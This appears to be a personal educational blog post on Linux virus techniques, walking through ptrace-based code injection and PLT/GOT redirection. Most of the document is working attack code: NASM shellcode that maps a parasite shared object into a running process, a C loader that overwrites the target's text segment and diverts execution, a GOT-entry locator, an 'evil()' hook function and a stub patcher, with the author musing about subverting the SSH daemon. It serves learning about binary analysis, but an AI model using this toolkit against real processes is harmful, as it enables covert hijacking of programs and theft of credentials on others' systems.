This document was written specifically for educational purposes. I must emphasise the fact that the infection techniques and algorithms discussed within this document are already well known and have also been thoroughly detailed within other resources available on the internet.
This document outlines the Linux virus techniques I've learnt and implemented in order to hijack shared library functions within a program that is in the midst of execution. More specifically, it details how to divert the execution of an existing process, make it execute potentially malicious code that has been injected into the process address space, and then have execution control restored accordingly. This infection technique is commonly referred to as PLT/GOT redirection.
If you don't care about how I ended up going down this rabbit hole, then feel free to skip this entire section and start here.
This is my first attempt at writing a technical piece of work, so please take that into consideration when reading through this document. Just to give you some insight into how I fell into this rabbit hole and started to learn about UNIX viruses, reverse engineering, and the enormous amount of other mind-bamboozling things that come along the way, I thought that I'd share a little story with you. Feel free to skip over this section if you don't like stories, but I thought it was rather interesting how I've gone from not knowing anything about Linux infection techniques to having a basic understanding of this particular topic, along with some of the interrelated topics that come with learning about Linux viruses and binary analysis.
Towards the end of 2017 my colleague (@steve2) and I were discussing stuff at work, as you normally do. The topic of "breaking into things" arose, and by "things" we were literally referring to compromising systems and how attackers use their strategies and techniques to essentially "steal credentials" and "own shit". Honestly speaking, I've never exploited a system or network, and even if I had, I wouldn't necessarily confess it on here. Anyway, my colleague, who has an extensive amount of knowledge on computer security, asked me a very simple question along the lines of "How would you go about changing a shell environment variable that has been initialized to be READONLY?". I replied "I don't know, but let me think about it and I'll get back to you". As an enthusiastic security engineer, I went away and started brainstorming all the different ways I could achieve this. On the train commute home, I could only think of using a debugger to somehow attach myself to the shell process and either alter the memory contents or invoke a function that would unset the environment variable that I specified. But how? I didn't know how to use a debugger effectively, nor could I comprehend what a disassembled binary even looks like, or how the Linux kernel loads the different program segments into memory. At that point I came to terms with the fact that it was going to be a steep learning curve and that I still had a lot to learn. I didn't end up solving the problem that very same evening. The following day my colleague asked "Did you manage to solve that little exercise we spoke about yesterday?", and I simply responded with "No", feeling rather embarrassed.
The conversation then spiralled off into something completely random and eventually returned with another question, which was along the lines of "Have you ever heard of ptrace?". Again, I responded with "Eh, no", and at this point I really felt embarrassed, because I felt as though I should already know about all these wonderful "utilities" and how to use them effectively. His response was something along the lines of "Dude, literally go and read the man page for the ptrace system call". I replied "Sure, no worries" and went to enter `man ptrace` into one of my shells. All it took was for me to read the very first sentence, which is along the lines of "The ptrace() system call provides a means by which one process (the "tracer") may observe and control the execution of another process (the "tracee"), and examine and change the tracee's memory and registers.". At this point, my mind was literally stuck in an endless loop where each iteration was a new idea on how I could use this system call to do some really "interesting" things. One of the first things that came to my mind was how on earth I could subvert the SSH daemon into doing something that it was never designed to do.
For information about the ELF file format, I highly encourage you to read through the ELF specification.
The assembly code provided below, once assembled and linked, is what we commonly refer to as "shellcode". Shellcode is typically a sequence of self-contained machine instructions that must be ready to take control of the processor regardless of the current processor state. The term "shellcode" does not necessarily mean that the purpose of the instructions is to spawn a shell per se; rather, it has become a more generic term used to describe a segment of position-independent code that can be executed directly by the CPU.
When shellcode is injected into a running process, it takes over like a biological virus inside a body, and this is exactly what the assembly code below has been designed to do, but in the context of computer programs. The primary objective of the shellcode below is to map a shared object file into the process that executes it. The technique used within this shellcode relies on two system calls, open() and mmap(), in order to load the shared object file into memory. Although this is a simple, clean, and effective means of loading your parasite code into a program image, it does have its drawbacks. The problem with this technique is that most shared libraries you'd want to load require relocations in order to execute correctly, so for the shared library to work using this simple method you will need to write the code so that it is completely position-independent. Within some of my upcoming posts I'm looking to explore how to use wrapper functions such as __libc_dlopen_mode() and __libc_dlsym(), made available within GLIBC, so that the dynamic linker can be invoked from the program and have it perform all the relocations.
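For readers who find C easier to follow than assembly, here is a minimal sketch of the same open() and mmap() sequence written against the libc wrappers. The helper name map_object() and its parameters are my own illustration and are not part of the parasite. Unlike the shellcode, it checks for errors and closes the descriptor. The static assertions simply confirm that the symbolic constants match the raw values used by the shellcode on Linux x86-64.

```c
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/* The raw constants the shellcode loads into registers (Linux x86-64). */
_Static_assert(O_RDONLY == 0x0, "rsi for sys_open");
_Static_assert((PROT_READ | PROT_WRITE | PROT_EXEC) == 0x7, "rdx for sys_mmap");
_Static_assert(MAP_PRIVATE == 0x2, "r10 for sys_mmap");

/*
 * Hypothetical helper: map the first `length` bytes of `path` into the
 * calling process with protection `prot`. Returns the base address of the
 * mapping, or NULL on failure.
 */
static void *map_object(const char *path, size_t length, int prot)
{
    int fd;
    void *base;

    assert(path != NULL && length > 0);

    fd = open(path, O_RDONLY);
    if (fd == -1)
        return NULL;

    /* NULL lets the kernel choose the address, as the shellcode does. */
    base = mmap(NULL, length, prot, MAP_PRIVATE, fd, 0);
    close(fd); /* the mapping stays valid after the descriptor is closed */

    return base == MAP_FAILED ? NULL : base;
}
```

Calling map_object("/lib/library.so.1.0", 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC) would mirror what the shellcode asks the kernel to do.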
I've detailed the path of execution for the parasite loader below and have provided the assembler code and disassemblies for reference.
Use the short relative JMP instruction to transfer control to the instruction referenced by the label 'do_call'.
jmp short do_call
Branch to the procedure location referenced by the 'jmp_back' label. The use of the CALL instruction here ensures that the return address, which is the address of the bytes immediately following the CALL instruction, is pushed onto the stack. In this particular instance that address holds the string constant that represents the absolute path of the file to be mapped into the program image address space.
call jmp_back
library: db "/lib/library.so.1.0", 00
Prepare the registers with the values required for the sys_open system call and pass control to the kernel by issuing the 'syscall' instruction. The use of the POP instruction here is to obtain the offset address of the string constant.
pop rdi
xor rsi, rsi
xor rax, rax
mov al, 0x2
syscall
Prepare the registers with the values required for the sys_mmap system call and again pass control to the kernel by issuing the 'syscall' instruction.
xor rdi, rdi
xor rsi, rsi
mov si, 0x2000
xor rdx, rdx
mov dl, 0x7
xor r10, r10
mov r10b, 0x2
xor r8, r8
mov r8b, al
xor r9, r9
xor rax, rax
mov al, 0x9
syscall
Finish with an 'int3' instruction so that the process in which the shellcode is executing receives a SIGTRAP signal. Because the process is being traced, it stops and the tracer is notified, which allows the attached program to take back control and restore execution.
int3
The complete assembly source code for the parasite loader is provided below.
; Assembly code that invokes the Linux sys_open and sys_mmap system calls in
; order to inject the shared object into a process's address space.
;
; Author: Matthew Bobrowski
; Build:
;   nasm -f elf64 parasite.asm
;   ld -o parasite parasite.o

section .text
        ; The _start symbol must be declared for the linker program (ld)
        global _start

_start:
        ; Small nop-sled used as a safe-guard when diverting execution
        nop
        nop
        nop
        nop
        jmp short do_call

jmp_back:
        ; Prepare arguments for the sys_open system call
        ; - rdi: pointer to string
        ; - rsi: file access mode (O_RDONLY)
        ; - rax: system call number (sys_open)
        pop rdi
        xor rsi, rsi
        xor rax, rax
        mov al, 0x2

        ; Execute the sys_open system call
        syscall

        ; Prepare arguments for the sys_mmap system call
        ; - rdi: starting address of mapped file (NULL, allow kernel to choose)
        ; - rsi: length of bytes starting at offset (8192 bytes)
        ; - rdx: protection of mapping (PROT_EXEC | PROT_READ | PROT_WRITE)
        ; - r10: mapped memory visibility (MAP_PRIVATE)
        ; - r8: file descriptor returned by sys_open
        ; - r9: starting offset (0)
        ; - rax: system call number (sys_mmap)
        xor rdi, rdi
        xor rsi, rsi
        mov si, 0x2000
        xor rdx, rdx
        mov dl, 0x7
        xor r10, r10
        mov r10b, 0x2
        xor r8, r8
        mov r8b, al
        xor r9, r9
        xor rax, rax
        mov al, 0x9

        ; Execute the sys_mmap system call
        syscall

        ; Signal (SIGTRAP) a breakpoint to the debugger to restore execution
        int3

do_call:
        call jmp_back

library:
        db "/lib/library.so.1.0", 00
Below is the disassembly of the compiled source code above.
parasite:     file format elf64-x86-64

Disassembly of section .text:

0000000000400080 <_start>:
  400080:  eb 31                   jmp    4000b3

0000000000400082 <jmp_back>:
  400082:  5f                      pop    rdi
  400083:  48 31 f6                xor    rsi,rsi
  400086:  48 31 c0                xor    rax,rax
  400089:  b0 02                   mov    al,0x2
  40008b:  0f 05                   syscall
  40008d:  48 31 ff                xor    rdi,rdi
  400090:  48 31 f6                xor    rsi,rsi
  400093:  66 be 00 20             mov    si,0x2000
  400097:  48 31 d2                xor    rdx,rdx
  40009a:  b2 07                   mov    dl,0x7
  40009c:  4d 31 d2                xor    r10,r10
  40009f:  41 b2 02                mov    r10b,0x2
  4000a2:  4d 31 c0                xor    r8,r8
  4000a5:  41 88 c0                mov    r8b,al
  4000a8:  4d 31 c9                xor    r9,r9
  4000ab:  48 31 c0                xor    rax,rax
  4000ae:  b0 09                   mov    al,0x9
  4000b0:  0f 05                   syscall
  4000b2:  cc                      int3

00000000004000b3 <do_call>:
  4000b3:  e8 ca ff ff ff          call   400082

00000000004000b8 <library>:
  4000b8:  2f                      (bad)
  4000b9:  6c                      ins    BYTE PTR es:[rdi],dx
  4000ba:  69 62 2f 6c 69 62 72    imul   esp,DWORD PTR [rdx+0x2f],0x7262696c
  4000c1:  61                      (bad)
  4000c2:  72 79                   jb     40013d
  4000c4:  2e 73 6f                cs jae 400136
  4000c7:  2e 31 2e                xor    DWORD PTR cs:[rsi],ebp
  4000ca:  30 00                   xor    BYTE PTR [rax],al
  ^        ^                       ^
  Address  Opcode / Instruction    Assembly
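The two control transfers in the disassembly are encoded relative to the end of each instruction, which is what keeps the loader position-independent. As a small worked check (the helper names below are mine, purely for illustration), the displacement bytes `eb 31` and `e8 ca ff ff ff` can be recomputed from the addresses shown, along with the return address that CALL pushes.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Displacement encoded in a relative JMP/CALL: the distance from the end of
 * the instruction (its address plus its length) to the branch target.
 */
static int32_t rel_displacement(uint64_t insn_addr, unsigned insn_len,
                                uint64_t target)
{
    int64_t disp = (int64_t)(target - (insn_addr + insn_len));

    assert(disp >= INT32_MIN && disp <= INT32_MAX);
    return (int32_t)disp;
}

/* Return address pushed by a CALL: the address of whatever follows it. */
static uint64_t call_return_address(uint64_t insn_addr, unsigned insn_len)
{
    return insn_addr + insn_len;
}
```

With the addresses above, rel_displacement(0x400080, 2, 0x4000b3) gives 0x31, and rel_displacement(0x4000b3, 5, 0x400082) gives -0x36, which is stored little-endian as `ca ff ff ff`. call_return_address(0x4000b3, 5) is 0x4000b8, the address of the path string that the following POP retrieves.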
This section explores how to inject the shellcode and divert the execution of the running process to code that we control. The code injection and execution diversion techniques discussed here are achieved by using the ptrace system call made available on Unix and Unix-like operating systems. In essence, ptrace is a versatile and rather complex interface that allows one process to control the execution of another and to peek and poke at its innards. I'll only be covering a subset of the ptrace control mechanisms within this document, so if you're curious to see what else the ptrace system call is capable of and how it pertains to working with process images, I'd highly encourage you to read through the ptrace man page.
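The listings later in this document rely on two helpers, ptrace_peektext() and ptrace_poketext(), whose definitions are not shown. The sketch below is my guess at what such helpers might look like, not the original implementation; the names peek_text() and poke_text() and their return conventions are assumptions. They copy memory one machine word at a time, since that is the unit PTRACE_PEEKTEXT and PTRACE_POKETEXT operate on.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <unistd.h>

/* Copy `size` bytes from the tracee at `addr` into `out`. 0 on success, -1 on error. */
static int peek_text(pid_t pid, unsigned long addr, void *out, size_t size)
{
    unsigned char *dst = out;
    size_t done = 0;

    assert(out != NULL);

    while (done < size) {
        long word;
        size_t chunk = size - done < sizeof(word) ? size - done : sizeof(word);

        errno = 0; /* -1 is also a valid word, so errno disambiguates */
        word = ptrace(PTRACE_PEEKTEXT, pid, (void *)(addr + done), NULL);
        if (word == -1 && errno != 0)
            return -1;

        memcpy(dst + done, &word, chunk);
        done += chunk;
    }
    return 0;
}

/* Write `size` bytes from `in` to the tracee at `addr`. 0 on success, -1 on error. */
static int poke_text(pid_t pid, unsigned long addr, const void *in, size_t size)
{
    const unsigned char *src = in;
    size_t done = 0;

    assert(in != NULL);

    while (done < size) {
        long word = 0;
        size_t chunk = size - done < sizeof(word) ? size - done : sizeof(word);

        /* Partial trailing word: read it first so neighbouring bytes survive. */
        if (chunk < sizeof(word) &&
            peek_text(pid, addr + done, &word, sizeof(word)) == -1)
            return -1;

        memcpy(&word, src + done, chunk);
        if (ptrace(PTRACE_POKETEXT, pid, (void *)(addr + done), (void *)word) == -1)
            return -1;

        done += chunk;
    }
    return 0;
}
```

Both helpers only work on a process that the caller is already tracing and that is currently stopped; on any other pid they fail and return -1.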
Prior to being able to execute the shellcode and have the process load the shared object file into its address space, we need to inject the loader into the process image. The stack may potentially work for this purpose; however, some systems enforce protection mechanisms on the stack portion of the process's virtual address space, marking it non-executable so that attack code injected onto the stack cannot be executed. In Linux kernels that are not patched with PaX, the default behaviour of ptrace is such that it permits the tracer to write to memory segments that have been loaded as non-writable. Seeing as the Linux kernel that I'm currently working on hasn't had the PaX patches applied, it would be wise to use the text segment and overwrite the first sizeof(shellcode) bytes with our shellcode, starting at the base address 0x400000. This is the default base address of the text segment for a position-dependent (non-PIE) ELF executable built for x86_64 platforms.
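The fixed 0x400000 address is an assumption that holds for the binaries used here. Position-independent executables are loaded at a randomised address, and on some toolchains the first mapping holds only the ELF headers and is not executable. A hedged alternative is to look the address up in /proc/<pid>/maps. The sketch below uses hypothetical helper names of my own and returns the start of the first executable mapping, which is usually, though not necessarily, the main program's text.

```c
#include <assert.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Parse the leading "start-end perms" fields of one /proc/<pid>/maps line.
 * Returns 1 on success, 0 if the line does not have that shape.
 */
static int parse_maps_line(const char *line, unsigned long *start,
                           unsigned long *end, char perms[5])
{
    assert(line != NULL);
    return sscanf(line, "%lx-%lx %4s", start, end, perms) == 3;
}

/* Start address of the first executable mapping of `pid`, or 0 if none was found. */
static unsigned long first_exec_mapping(pid_t pid)
{
    char path[64], line[512], perms[5];
    unsigned long start, end, found = 0;
    FILE *fp;

    snprintf(path, sizeof(path), "/proc/%d/maps", (int)pid);
    fp = fopen(path, "r");
    if (fp == NULL)
        return 0;

    while (fgets(line, sizeof(line), fp) != NULL) {
        /* perms looks like "r-xp"; index 2 is the execute bit. */
        if (parse_maps_line(line, &start, &end, perms) && perms[2] == 'x') {
            found = start;
            break;
        }
    }

    fclose(fp);
    return found;
}
```

The returned address could be used in place of the hard-coded base address in the loader.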
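Upon attaching to the process via PTRACE_ATTACH, the following steps need to be performed: back up the first 128 bytes of the text segment, overwrite them with the shellcode, save the current register state, point RIP at the shellcode, resume the process and wait for the SIGTRAP raised by the trailing int3, read the base address of the new mapping from RAX, and finally restore the original text bytes and registers.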
The source code below is the implementation of the above diversion and restoration procedure.
static long loader(pid_t pid)
{
    long base;
    int status;
    long buffer[16];
    unsigned char text[128];
    unsigned long offset = 0x400000;
    struct user_regs_struct registers;
    struct user_regs_struct saved;

    /* Back up the first 128 bytes of the text segment. */
    ptrace_peektext(pid, offset, buffer, 128);
    memcpy(text, buffer, 128);

    /* Overwrite them with the shellcode. */
    ptrace_poketext(pid, offset, (long *) shellcode, sizeof(shellcode));

    if (ptrace(PTRACE_GETREGS, pid, NULL, &registers) == -1) {
        perror("ptrace(PTRACE_GETREGS)");
        exit(EXIT_FAILURE);
    }

    /*
     * Keep a full copy of the register state. The syscall instruction also
     * clobbers rcx and r11, so restoring only the argument registers is not
     * enough to leave the tracee exactly as it was found.
     */
    saved = registers;

    /*
     * Land inside the nop-sled. This presumably guards against the kernel
     * rewinding rip by two bytes when it restarts an interrupted system call.
     */
    registers.rip = offset + 2;

    if (ptrace(PTRACE_SETREGS, pid, NULL, &registers) == -1) {
        perror("ptrace(PTRACE_SETREGS)");
        exit(EXIT_FAILURE);
    }

    if (ptrace(PTRACE_CONT, pid, NULL, NULL) == -1) {
        perror("ptrace(PTRACE_CONT)");
        exit(EXIT_FAILURE);
    }

    /* Wait for the SIGTRAP raised by the int3 at the end of the shellcode. */
    do {
        wait(&status);
    } while (WIFSTOPPED(status) && WSTOPSIG(status) != SIGTRAP);

    if (ptrace(PTRACE_GETREGS, pid, NULL, &registers) == -1) {
        perror("ptrace(PTRACE_GETREGS)");
        exit(EXIT_FAILURE);
    }

    /* rax holds the return value of sys_mmap: the base of the new mapping. */
    base = registers.rax;

    /* Put the original text bytes and registers back. */
    ptrace_poketext(pid, offset, (long *) text, 128);

    if (ptrace(PTRACE_SETREGS, pid, NULL, &saved) == -1) {
        perror("ptrace(PTRACE_SETREGS)");
        exit(EXIT_FAILURE);
    }

    return base;
}
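The wait loop in the loader assumes that the next stop is either the SIGTRAP or something harmless. If the tracee stops for a different signal, it stays stopped until the tracer resumes it, and if it dies there is nothing left to restore. A slightly more defensive variant might look like the sketch below. The names classify_status() and wait_for_trap() are hypothetical, and forwarding the unrelated signal to the tracee is a design choice of mine rather than something the original code does.

```c
#include <assert.h>
#include <signal.h>
#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

enum stop_reason { STOP_TRAP, STOP_OTHER_SIGNAL, STOP_GONE };

/* Interpret a wait status from the point of view of the loader. */
static enum stop_reason classify_status(int status)
{
    if (WIFEXITED(status) || WIFSIGNALED(status))
        return STOP_GONE;
    if (WIFSTOPPED(status) && WSTOPSIG(status) == SIGTRAP)
        return STOP_TRAP;
    return STOP_OTHER_SIGNAL;
}

/* Block until the tracee hits int3. 0 on SIGTRAP, -1 if it died or waiting failed. */
static int wait_for_trap(pid_t pid)
{
    int status;

    assert(pid > 0);

    for (;;) {
        if (waitpid(pid, &status, 0) == -1)
            return -1;

        switch (classify_status(status)) {
        case STOP_TRAP:
            return 0;
        case STOP_GONE:
            return -1;
        case STOP_OTHER_SIGNAL:
            /* Resume the tracee, delivering the signal that stopped it. */
            if (ptrace(PTRACE_CONT, pid, NULL,
                       (void *)(long)WSTOPSIG(status)) == -1)
                return -1;
            break;
        }
    }
}
```

A caller would replace the do/while loop with a check such as `if (wait_for_trap(pid) == -1)` and bail out before touching the registers.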
This section provides the semantic details on how the shared library functions that are referenced within the program's text segment can be hijacked. The GOT is a section that resides within the data segment of the program image. It is a table predominantly comprised of function pointers to shared library functions that have been resolved by the dynamic linking process. Typically, the GOT is writable, which means that it is both attractive and practical for an attacker to overwrite a function pointer GOT entry with the address of their own code. Upon successfully modifying the GOT entry, the next time the shared library function is called within the program you can expect the control flow to be redirected to something other than the original shared library function. You may be wondering whether there are mitigation techniques available to harden the data sections within a process image. There certainly are, and one such technique is RELRO (relocation read-only). I'm not going to cover it within this document; however, I encourage you to read about it, as it is certainly interesting and something to be aware of.
Firstly, in order to patch the GOT entry with the address of our code, we need to determine the name of the shared library function we would like to hijack and find the corresponding address of its GOT entry. If we look at the structure of a relocation entry, we can see that it provides two useful fields labelled 'r_offset' and 'r_info'. In this particular instance the value of the 'r_offset' field provides the virtual memory address at which the dynamic linker applies the relocation, which is the GOT entry itself, and the 'r_info' field provides a means of obtaining the corresponding symbol table index via the helper macro ELF64_R_SYM(i), which expands to ((i) >> 32). The function below iterates through each of the relocation entries found in the table referenced by DT_JMPREL. For each relocation entry the associated symbol is obtained from DT_SYMTAB using the 'r_info' field, and its name is checked against the shared library function name provided as an argument. If there is a match, the 'r_offset' value is returned to the caller.
static Elf64_Addr relocation_offset(pid_t pid, const char *name, Elf64_Addr address)
{
    size_t i, count;
    Elf64_Addr base = address;
    Elf64_Addr relocs = 0;
    Elf64_Addr symtab = 0;
    Elf64_Addr strtab = 0;
    Elf64_Xword size = 0;
    Elf64_Dyn dyn;
    Elf64_Rela rela;
    Elf64_Ehdr e_hdr;
    Elf64_Phdr p_hdr;

    /* Read the ELF header and walk the program headers up to PT_DYNAMIC. */
    ptrace_peektext(pid, base, &e_hdr, sizeof(Elf64_Ehdr));
    base += e_hdr.e_phoff;

    for (i = 0; i < e_hdr.e_phnum; i++) {
        ptrace_peektext(pid, base, &p_hdr, sizeof(Elf64_Phdr));
        if (p_hdr.p_type == PT_DYNAMIC)
            break;
        base += sizeof(Elf64_Phdr);
    }

    /* No dynamic segment, e.g. a statically linked program. */
    if (i == e_hdr.e_phnum)
        return 0;

    /* Collect the dynamic entries needed to resolve the PLT relocations. */
    base = p_hdr.p_vaddr;

    do {
        ptrace_peektext(pid, base, &dyn, sizeof(Elf64_Dyn));

        switch (dyn.d_tag) {
        case DT_SYMTAB:
            symtab = dyn.d_un.d_ptr;
            break;
        case DT_STRTAB:
            strtab = dyn.d_un.d_ptr;
            break;
        case DT_PLTRELSZ:
            size = dyn.d_un.d_val;
            break;
        case DT_JMPREL:
            relocs = dyn.d_un.d_ptr;
            break;
        default:
            break;
        }

        base += sizeof(Elf64_Dyn);
    } while (dyn.d_tag != DT_NULL);

    if (relocs == 0 || symtab == 0 || strtab == 0)
        return 0;

    /* Compare the symbol name of every PLT relocation against 'name'. */
    count = size / sizeof(Elf64_Rela);

    for (i = 0; i < count; i++, relocs += sizeof(Elf64_Rela)) {
        size_t index;
        char buff[40];
        Elf64_Sym symbol;

        ptrace_peektext(pid, relocs, &rela, sizeof(Elf64_Rela));
        index = ELF64_R_SYM(rela.r_info);

        ptrace_peektext(pid, symtab + (index * sizeof(Elf64_Sym)),
                        &symbol, sizeof(Elf64_Sym));
        ptrace_peektext(pid, strtab + symbol.st_name, buff, sizeof(buff));

        /* Longer names are truncated; make sure strcmp() always terminates. */
        buff[sizeof(buff) - 1] = '\0';

        if (strcmp(name, buff) == 0)
            return rela.r_offset;
    }

    return 0;
}
Once the offset address of the relocation entry is returned by this function, the associated GOT entry for this shared library call can be patched accordingly. We can simply use ptrace(PTRACE_POKETEXT, ...) in order to perform this update i.e.
ptrace_poketext(pid, reloc, &patch, sizeof(Elf64_Addr));
Prior to updating the GOT entry, it is imperative that the function pointer currently stored at that location is saved for later use. In most cases the address that resides there prior to the manual overwrite is the dynamically resolved function address populated by the dynamic linker itself. If lazy binding is in effect and the function has not yet been called, the entry will instead still point back into the function's PLT stub.
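The save-then-overwrite order matters because the saved pointer is the only way back to the real function. The toy model below illustrates the idea inside a single process, using an ordinary array of function pointers as a stand-in for the GOT. It is not a real GOT and involves no ptrace; all of the names are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef size_t (*strlen_fn)(const char *);

/* Toy stand-in for a GOT: one slot holding a resolved function pointer. */
static strlen_fn toy_got[1] = { strlen };

/* Copy of the slot's original contents, used to chain back. */
static strlen_fn saved_entry;

/* Counts how many calls were diverted through the hook. */
static int hook_calls;

static size_t hooked_strlen(const char *s)
{
    hook_calls++;          /* the "parasite" work would go here */
    return saved_entry(s); /* then hand control to the original function */
}

static void install_hook(void)
{
    /* Installing twice would make the hook call itself forever. */
    assert(toy_got[0] != hooked_strlen);

    saved_entry = toy_got[0];   /* save the original pointer first ... */
    toy_got[0] = hooked_strlen; /* ... then overwrite the slot */
}
```

Callers that go through toy_got[0] get the same results before and after install_hook(), but afterwards every call passes through hooked_strlen() first.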
Once control has been passed to the arbitrary function, we need to implement a mechanism that will allow us to pass execution back to the original shared library function. The malicious code has been designed to include a function pointer stub, which is intended to be replaced with the address of the original function.
static long evil()
{
    char value[10];

    value[0] = 'I';
    value[1] = 'n';
    value[2] = 'f';
    value[3] = 'e';
    value[4] = 'c';
    value[5] = 't';
    value[6] = 'e';
    value[7] = 'd';
    value[8] = '\0';

    /* Placeholder address, patched at run time with the original function. */
    long (*original)(char *buffer) = (long (*)(char *)) 0x7fffffffffff;

    return original(value);
}
Locate the sequence of bytes that are to be patched by looking at the function disassembly.
library.so.1.0:     file format elf64-x86-64

Disassembly of section .text:

0000000000000211 <evil>:
 211:  55                      push   rbp
 212:  48 89 e5                mov    rbp,rsp
 215:  48 83 ec 20             sub    rsp,0x20
 219:  c6 45 e0 49             mov    BYTE PTR [rbp-0x20],0x49
 21d:  c6 45 e1 6e             mov    BYTE PTR [rbp-0x1f],0x6e
 221:  c6 45 e2 66             mov    BYTE PTR [rbp-0x1e],0x66
 225:  c6 45 e3 65             mov    BYTE PTR [rbp-0x1d],0x65
 229:  c6 45 e4 63             mov    BYTE PTR [rbp-0x1c],0x63
 22d:  c6 45 e5 74             mov    BYTE PTR [rbp-0x1b],0x74
 231:  c6 45 e6 65             mov    BYTE PTR [rbp-0x1a],0x65
 235:  c6 45 e7 64             mov    BYTE PTR [rbp-0x19],0x64
 239:  c6 45 e8 00             mov    BYTE PTR [rbp-0x18],0x0
 23d:  48 b8 ff ff ff ff ff    movabs rax,0x7fffffffffff
 244:  7f 00 00
 247:  48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax
 24b:  48 8d 55 e0             lea    rdx,[rbp-0x20]
 24f:  48 8b 45 f8             mov    rax,QWORD PTR [rbp-0x8]
 253:  48 89 d7                mov    rdi,rdx
 256:  ff d0                   call   rax
 258:  c9                      leave
 259:  c3                      ret
The byte sequence "\xe8\x00\x48\xb8" in the above disassembly marks the stub. It is made up of the last two bytes of the instruction that stores the terminating NUL (c6 45 e8 00) followed by the two-byte movabs opcode (48 b8). The eight bytes that come immediately after it hold the placeholder address, and these are the bytes we patch with the original function address. In the code below, once the signature is located at (offset + i), we patch the code four bytes further on using ptrace(PTRACE_POKETEXT, ...).
static int patch_function(pid_t pid, Elf64_Addr offset, Elf64_Addr address)
{
    size_t i, len;
    uint8_t buff[80];
    /* Tail of the NUL store followed by the movabs opcode. */
    const uint8_t transfer[] = { 0xe8, 0x00, 0x48, 0xb8 };

    ptrace_peektext(pid, offset, buff, sizeof(buff));

    /* Stop early enough that the comparison never reads past the buffer. */
    for (i = 0, len = sizeof(buff); i + sizeof(transfer) <= len; i++) {
        if (memcmp(&buff[i], transfer, sizeof(transfer)) == 0) {
            /* The 8-byte immediate starts right after the signature. */
            ptrace_poketext(pid, (offset + i) + sizeof(transfer),
                            &address, sizeof(Elf64_Addr));
            return 0;
        }
    }

    return -1;
}
Now that there is a means of diverting execution through a hijacked shared library function and passing execution back, we can safely detach from the tracee process and allow it to continue.
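The signature search can be tried out on a local buffer without attaching to anything. The sketch below is a stand-alone variant with hypothetical names (find_stub() and patch_stub()). It additionally makes sure that the whole 8-byte immediate lies inside the buffer before reporting a match, and it assumes a little-endian host such as x86_64.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Tail of `mov BYTE PTR [rbp-0x18],0x0` followed by the movabs opcode. */
static const uint8_t signature[] = { 0xe8, 0x00, 0x48, 0xb8 };

/* Offset of the 8-byte immediate that follows the signature, or -1 if absent. */
static long find_stub(const uint8_t *code, size_t len)
{
    size_t need = sizeof(signature) + sizeof(uint64_t);
    size_t i;

    assert(code != NULL);

    for (i = 0; i + need <= len; i++) {
        if (memcmp(code + i, signature, sizeof(signature)) == 0)
            return (long)(i + sizeof(signature));
    }
    return -1;
}

/* Overwrite the placeholder immediate with `address`. 0 on success, -1 if not found. */
static int patch_stub(uint8_t *code, size_t len, uint64_t address)
{
    long at = find_stub(code, len);

    if (at < 0)
        return -1;

    /* Little-endian host assumed, matching the byte order of the immediate. */
    memcpy(code + at, &address, sizeof(address));
    return 0;
}
```

Fed the bytes from address 0x239 onwards in the disassembly above, find_stub() reports offset 6, which is where the `ff ff ff ff ff 7f 00 00` placeholder begins.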
ptrace(PTRACE_DETACH, pid, NULL, NULL);
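For completeness, the attach and detach calls that bracket the whole procedure could be wrapped as in the sketch below. The function names are hypothetical. The important detail is that PTRACE_ATTACH only requests a stop, so the tracer should wait for the tracee to actually stop before peeking, poking, or reading registers.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Attach to `pid` and wait until it has stopped. 0 on success, -1 on failure. */
static int attach_process(pid_t pid)
{
    int status;

    assert(pid > 0);

    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) == -1)
        return -1;

    /* The tracee is sent SIGSTOP; it must be stopped before it can be inspected. */
    if (waitpid(pid, &status, 0) == -1 || !WIFSTOPPED(status)) {
        ptrace(PTRACE_DETACH, pid, NULL, NULL);
        return -1;
    }
    return 0;
}

/* Detach from `pid` and let it run freely again. 0 on success, -1 on failure. */
static int detach_process(pid_t pid)
{
    assert(pid > 0);
    return ptrace(PTRACE_DETACH, pid, NULL, NULL) == -1 ? -1 : 0;
}
```

Whether attaching succeeds depends on the privileges of the tracer and on system policy, so both return values are worth checking.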
I'd like to thank both @elfmaster and @silviocesare for the phenomenal work they've done in the Linux virus space.
You can clone/download the latest version of the software from my GitHub. The repository URL can be found below.